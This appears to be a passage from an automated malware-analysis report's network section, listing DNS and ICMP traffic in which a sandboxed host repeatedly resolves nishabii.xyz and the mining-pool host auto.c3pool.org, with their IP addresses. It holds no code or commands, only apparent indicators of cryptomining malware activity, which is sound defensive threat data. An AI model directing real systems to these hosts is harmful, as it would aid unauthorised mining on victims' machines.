Jun 14, 2024 16:39:47.125238895 CEST	53	54563	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:47.493645906 CEST	57498	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:47.662659883 CEST	53	57498	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:48.177509069 CEST	57197	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:48.189455032 CEST	53	57197	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:49.351273060 CEST	60469	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:49.366173029 CEST	53	60469	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:52.199090004 CEST	57755	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:52.206908941 CEST	53	57755	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:52.842394114 CEST	58291	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:52.851623058 CEST	53	58291	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:53.982557058 CEST	53930	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:53.991843939 CEST	53	53930	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:57.723014116 CEST	56155	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:57.733269930 CEST	53	56155	1.1.1.1	192.168.2.5
Jun 14, 2024 16:39:58.598084927 CEST	65407	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:39:58.607726097 CEST	53	65407	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:04.311074018 CEST	58748	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:04.323656082 CEST	53	58748	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:10.040086985 CEST	55297	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:10.055397034 CEST	53	55297	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:15.786178112 CEST	51881	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:15.805620909 CEST	53	51881	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:21.532521009 CEST	65195	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:21.548441887 CEST	53	65195	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:27.250539064 CEST	57921	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:27.260657072 CEST	53	57921	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:33.006129980 CEST	57282	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:33.043698072 CEST	53	57282	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:38.769341946 CEST	51668	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:38.778229952 CEST	53	51668	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:44.906886101 CEST	63120	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:45.024560928 CEST	53	63120	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:50.779872894 CEST	58199	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:50.787760973 CEST	53	58199	1.1.1.1	192.168.2.5
Jun 14, 2024 16:40:56.745181084 CEST	56078	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:40:56.754363060 CEST	53	56078	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:02.655040026 CEST	55474	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:02.676063061 CEST	53	55474	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:08.451473951 CEST	64731	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:08.473469019 CEST	53	64731	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:15.304455996 CEST	58984	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:15.405395985 CEST	53	58984	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:21.188775063 CEST	64335	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:21.222673893 CEST	53	64335	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:26.944734097 CEST	57417	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:26.956490040 CEST	53	57417	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:32.705446005 CEST	53743	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:32.713244915 CEST	53	53743	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:38.468225956 CEST	54644	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:38.592585087 CEST	53	54644	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:44.341907024 CEST	53631	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:44.350460052 CEST	53	53631	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:50.047370911 CEST	56322	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:50.084430933 CEST	53	56322	1.1.1.1	192.168.2.5
Jun 14, 2024 16:41:55.815088987 CEST	64502	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:41:55.847999096 CEST	53	64502	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:02.608319044 CEST	54243	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:02.627578020 CEST	53	54243	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:08.359296083 CEST	59228	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:08.395011902 CEST	53	59228	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:14.130311012 CEST	64505	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:14.138712883 CEST	53	64505	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:19.873642921 CEST	64142	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:19.881808043 CEST	53	64142	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:25.608925104 CEST	59715	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:25.616792917 CEST	53	59715	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:31.351982117 CEST	51923	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:31.378448009 CEST	53	51923	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:37.133915901 CEST	49438	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:37.154251099 CEST	53	49438	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:42.826927900 CEST	49693	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:42.857693911 CEST	53	49693	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:45.847286940 CEST	138	138	192.168.2.5	192.168.2.255
Jun 14, 2024 16:42:48.599064112 CEST	62251	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:48.607587099 CEST	53	62251	1.1.1.1	192.168.2.5
Jun 14, 2024 16:42:54.427287102 CEST	59442	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:42:54.437824011 CEST	53	59442	1.1.1.1	192.168.2.5
Jun 14, 2024 16:43:00.196284056 CEST	51629	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:43:00.225452900 CEST	53	51629	1.1.1.1	192.168.2.5
Jun 14, 2024 16:43:05.972054958 CEST	51185	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:43:05.998811007 CEST	53	51185	1.1.1.1	192.168.2.5
Jun 14, 2024 16:43:07.271794081 CEST	62034	53	192.168.2.5	1.1.1.1
Jun 14, 2024 16:43:07.282900095 CEST	53	62034	1.1.1.1	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jun 14, 2024 16:39:12.922187090 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:13.980874062 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:16.016192913 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:16.074604988 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:17.216545105 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:19.044131041 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:20.169069052 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:22.059905052 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:23.215303898 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:25.081271887 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:26.215337992 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:28.104064941 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:29.168423891 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable
Jun 14, 2024 16:39:31.168418884 CEST	192.168.2.1	192.168.2.5	827a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 14, 2024 16:39:00.433983088 CEST	192.168.2.5	1.1.1.1	0x42f2	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:05.895528078 CEST	192.168.2.5	1.1.1.1	0x58de	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:06.661930084 CEST	192.168.2.5	1.1.1.1	0x9457	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:09.546266079 CEST	192.168.2.5	1.1.1.1	0xde76	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:11.556313992 CEST	192.168.2.5	1.1.1.1	0x6acb	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:12.459299088 CEST	192.168.2.5	1.1.1.1	0x3d03	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:13.008563995 CEST	192.168.2.5	1.1.1.1	0xdc53	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:15.485945940 CEST	192.168.2.5	1.1.1.1	0xc3ce	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:18.233339071 CEST	192.168.2.5	1.1.1.1	0x8f49	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:21.375439882 CEST	192.168.2.5	1.1.1.1	0x21f3	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:23.595870018 CEST	192.168.2.5	1.1.1.1	0xbc1c	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:23.986196995 CEST	192.168.2.5	1.1.1.1	0x8ed3	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:24.975043058 CEST	192.168.2.5	1.1.1.1	0xbd39	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:27.528614044 CEST	192.168.2.5	1.1.1.1	0xeb72	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:29.733918905 CEST	192.168.2.5	1.1.1.1	0x3f3e	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:34.454636097 CEST	192.168.2.5	1.1.1.1	0x6a29	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:35.608994961 CEST	192.168.2.5	1.1.1.1	0xabbe	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:37.972758055 CEST	192.168.2.5	1.1.1.1	0xaf58	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:38.147275925 CEST	192.168.2.5	1.1.1.1	0x252e	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:39.242047071 CEST	192.168.2.5	1.1.1.1	0x5375	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:40.399857044 CEST	192.168.2.5	1.1.1.1	0x541	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:41.360898972 CEST	192.168.2.5	1.1.1.1	0x1fd6	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:42.439842939 CEST	192.168.2.5	1.1.1.1	0xf383	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:44.038427114 CEST	192.168.2.5	1.1.1.1	0x195	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:44.650044918 CEST	192.168.2.5	1.1.1.1	0xf8a2	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:45.449505091 CEST	192.168.2.5	1.1.1.1	0x3587	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:47.110012054 CEST	192.168.2.5	1.1.1.1	0x116d	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:47.493645906 CEST	192.168.2.5	1.1.1.1	0xa3cb	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:48.177509069 CEST	192.168.2.5	1.1.1.1	0xd331	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:49.351273060 CEST	192.168.2.5	1.1.1.1	0x60c5	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:52.199090004 CEST	192.168.2.5	1.1.1.1	0x1ed0	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:52.842394114 CEST	192.168.2.5	1.1.1.1	0x8120	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:53.982557058 CEST	192.168.2.5	1.1.1.1	0x9abc	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:57.723014116 CEST	192.168.2.5	1.1.1.1	0x5252	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:58.598084927 CEST	192.168.2.5	1.1.1.1	0x867a	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:04.311074018 CEST	192.168.2.5	1.1.1.1	0x56b	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:10.040086985 CEST	192.168.2.5	1.1.1.1	0xf291	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:15.786178112 CEST	192.168.2.5	1.1.1.1	0xe48b	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:21.532521009 CEST	192.168.2.5	1.1.1.1	0x652a	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:27.250539064 CEST	192.168.2.5	1.1.1.1	0x72e1	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:33.006129980 CEST	192.168.2.5	1.1.1.1	0xa600	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:38.769341946 CEST	192.168.2.5	1.1.1.1	0xdbe6	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:44.906886101 CEST	192.168.2.5	1.1.1.1	0x24a5	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:50.779872894 CEST	192.168.2.5	1.1.1.1	0x9d26	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:56.745181084 CEST	192.168.2.5	1.1.1.1	0x573	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:02.655040026 CEST	192.168.2.5	1.1.1.1	0x8e38	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:08.451473951 CEST	192.168.2.5	1.1.1.1	0x2d73	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:15.304455996 CEST	192.168.2.5	1.1.1.1	0x73eb	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:21.188775063 CEST	192.168.2.5	1.1.1.1	0x7c2c	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:26.944734097 CEST	192.168.2.5	1.1.1.1	0x5fbf	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:32.705446005 CEST	192.168.2.5	1.1.1.1	0xd9b9	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:38.468225956 CEST	192.168.2.5	1.1.1.1	0xe21c	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:44.341907024 CEST	192.168.2.5	1.1.1.1	0xb6a8	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:50.047370911 CEST	192.168.2.5	1.1.1.1	0x55cd	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:55.815088987 CEST	192.168.2.5	1.1.1.1	0xae7a	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:02.608319044 CEST	192.168.2.5	1.1.1.1	0xa9a3	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:08.359296083 CEST	192.168.2.5	1.1.1.1	0xdd37	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:14.130311012 CEST	192.168.2.5	1.1.1.1	0xfaf0	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:19.873642921 CEST	192.168.2.5	1.1.1.1	0xdef8	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:25.608925104 CEST	192.168.2.5	1.1.1.1	0x1cac	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:31.351982117 CEST	192.168.2.5	1.1.1.1	0x688b	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:37.133915901 CEST	192.168.2.5	1.1.1.1	0x198d	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:42.826927900 CEST	192.168.2.5	1.1.1.1	0xa278	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:48.599064112 CEST	192.168.2.5	1.1.1.1	0xa111	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:54.427287102 CEST	192.168.2.5	1.1.1.1	0x131e	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:00.196284056 CEST	192.168.2.5	1.1.1.1	0xcc48	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:05.972054958 CEST	192.168.2.5	1.1.1.1	0xf917	Standard query (0)	nishabii.xyz	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:07.271794081 CEST	192.168.2.5	1.1.1.1	0xc345	Standard query (0)	auto.c3pool.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jun 14, 2024 16:39:00.571789026 CEST	1.1.1.1	192.168.2.5	0x42f2	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:05.905776024 CEST	1.1.1.1	192.168.2.5	0x58de	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:05.905776024 CEST	1.1.1.1	192.168.2.5	0x58de	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:05.905776024 CEST	1.1.1.1	192.168.2.5	0x58de	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:06.687159061 CEST	1.1.1.1	192.168.2.5	0x9457	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:09.556647062 CEST	1.1.1.1	192.168.2.5	0xde76	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:09.556647062 CEST	1.1.1.1	192.168.2.5	0xde76	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:09.556647062 CEST	1.1.1.1	192.168.2.5	0xde76	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:11.887336016 CEST	1.1.1.1	192.168.2.5	0x6acb	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:11.887336016 CEST	1.1.1.1	192.168.2.5	0x6acb	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:11.887336016 CEST	1.1.1.1	192.168.2.5	0x6acb	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:12.486917973 CEST	1.1.1.1	192.168.2.5	0x3d03	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:13.017398119 CEST	1.1.1.1	192.168.2.5	0xdc53	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:13.017398119 CEST	1.1.1.1	192.168.2.5	0xdc53	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:13.017398119 CEST	1.1.1.1	192.168.2.5	0xdc53	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:15.815675974 CEST	1.1.1.1	192.168.2.5	0xc3ce	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:15.815675974 CEST	1.1.1.1	192.168.2.5	0xc3ce	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:15.815675974 CEST	1.1.1.1	192.168.2.5	0xc3ce	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:18.256098032 CEST	1.1.1.1	192.168.2.5	0x8f49	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:21.385143042 CEST	1.1.1.1	192.168.2.5	0x21f3	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:21.385143042 CEST	1.1.1.1	192.168.2.5	0x21f3	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:21.385143042 CEST	1.1.1.1	192.168.2.5	0x21f3	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:23.605611086 CEST	1.1.1.1	192.168.2.5	0xbc1c	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:23.605611086 CEST	1.1.1.1	192.168.2.5	0xbc1c	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:23.605611086 CEST	1.1.1.1	192.168.2.5	0xbc1c	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:24.019016981 CEST	1.1.1.1	192.168.2.5	0x8ed3	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:25.069993019 CEST	1.1.1.1	192.168.2.5	0xbd39	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:25.069993019 CEST	1.1.1.1	192.168.2.5	0xbd39	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:25.069993019 CEST	1.1.1.1	192.168.2.5	0xbd39	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:27.536391973 CEST	1.1.1.1	192.168.2.5	0xeb72	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:27.536391973 CEST	1.1.1.1	192.168.2.5	0xeb72	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:27.536391973 CEST	1.1.1.1	192.168.2.5	0xeb72	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:29.900546074 CEST	1.1.1.1	192.168.2.5	0x3f3e	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:34.464759111 CEST	1.1.1.1	192.168.2.5	0x6a29	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:34.464759111 CEST	1.1.1.1	192.168.2.5	0x6a29	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:34.464759111 CEST	1.1.1.1	192.168.2.5	0x6a29	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:35.634603024 CEST	1.1.1.1	192.168.2.5	0xabbe	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:37.980912924 CEST	1.1.1.1	192.168.2.5	0xaf58	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:37.980912924 CEST	1.1.1.1	192.168.2.5	0xaf58	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:37.980912924 CEST	1.1.1.1	192.168.2.5	0xaf58	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:38.157069921 CEST	1.1.1.1	192.168.2.5	0x252e	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:38.157069921 CEST	1.1.1.1	192.168.2.5	0x252e	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:38.157069921 CEST	1.1.1.1	192.168.2.5	0x252e	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:39.251591921 CEST	1.1.1.1	192.168.2.5	0x5375	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:39.251591921 CEST	1.1.1.1	192.168.2.5	0x5375	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:39.251591921 CEST	1.1.1.1	192.168.2.5	0x5375	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:40.409558058 CEST	1.1.1.1	192.168.2.5	0x541	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:40.409558058 CEST	1.1.1.1	192.168.2.5	0x541	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:40.409558058 CEST	1.1.1.1	192.168.2.5	0x541	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:41.388345957 CEST	1.1.1.1	192.168.2.5	0x1fd6	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:42.449311972 CEST	1.1.1.1	192.168.2.5	0xf383	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:42.449311972 CEST	1.1.1.1	192.168.2.5	0xf383	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:42.449311972 CEST	1.1.1.1	192.168.2.5	0xf383	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
